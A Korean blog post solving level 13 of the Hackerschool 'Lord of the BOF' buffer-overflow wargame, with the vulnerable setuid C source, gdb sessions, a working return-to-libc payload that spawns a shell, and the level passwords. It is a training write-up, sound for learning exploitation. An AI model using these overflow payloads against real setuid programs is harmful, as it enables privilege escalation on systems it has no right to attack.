해커스쿨 LOB LEVEL13 [darkknight -> bugbear] 풀이
M4ndU
해커스쿨 LOB [darkknight -> bugbear] 풀이입니다.
ID | darkknight
PW | new attacker
으로 로그인합니다.
\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.
$ bash2
그리고
$ ls -l
를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,
$ cat [문제이름].c
를 이용해 소스코드를 확인합시다.
login: darkknight
Password:
[darkknight@localhost darkknight]$ bash2
[darkknight@localhost darkknight]$ ls -l
total 16
-rwsr-sr-x 1 bugbear bugbear 12043 Mar 8 2010 bugbear
-rw-r--r-- 1 root root 385 Mar 29 2010 bugbear.c
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
리턴주소를 스택으로 돌릴 수 없다...
이번에는 RTL기법을 이용해서 문제를 푸는 것 같습니다.
system함수를 사용하겠습니다. system함수의 주소를 확인합니다.
[darkknight@localhost darkknight]$ mkdir tmp
[darkknight@localhost darkknight]$ cp bugbear tmp/
[darkknight@localhost darkknight]$ cd tmp/
[darkknight@localhost tmp]$ gdb bugbear -q
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/darkknight/tmp/bugbear
Breakpoint 1, 0x8048436 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"argv"+"/bin/sh"'`
[darkknight@localhost tmp]$ ./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"argv"+"/bin/sh"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argcargv/bin/sh
Segmentation fault (core dumped)
[darkknight@localhost tmp]$ gdb -c core -q
Core was generated by `./bugbear DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argcargv/bin/sh'.
Program terminated with signal 11, Segmentation fault.
#0 0x63677261 in ?? ()
(gdb) x/10s $esp
0xbffffac4: "argv/bin/sh"
0xbffffad0: "\002"
0xbffffad2: ""
0xbffffad3: ""
0xbffffad4: "\200\203\004\b"
0xbffffad9: ""
0xbffffada: ""
0xbffffadb: ""
0xbffffadc: "?203\004\b0\204\004\b\002"
0xbffffae6: ""
(gdb) x/s $esp+4
0xbffffac8: "/bin/sh"
찾았당
[darkknight@localhost darkknight]$ ./bugbear `python -c 'print "D"*44+"\xe0\x8a\x05\x40"+"argc"+"\xc8\xfa\xff\xbf"+"/bin/sh"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?@argc힐?bin/sh
bash$ my-pass
euid = 513
new divide
'System Hacking > LOB Redhat' 카테고리의 다른 글
| 해커스쿨 LOB LEVEL15 [giant -> assassin] 풀이 (0) | 2018.02.13 |
|---|---|
| 해커스쿨 LOB LEVEL14 [bugbear -> giant] 풀이 (0) | 2018.02.13 |
| 해커스쿨 LOB LEVEL12 [golem -> darkknight] 풀이 (0) | 2018.02.12 |
| 해커스쿨 LOB LEVEL11 [skeleton -> golem] 풀이 (0) | 2018.02.12 |
| 해커스쿨 LOB LEVEL10 [vampire -> skeleton] 풀이 (4) | 2018.02.11 |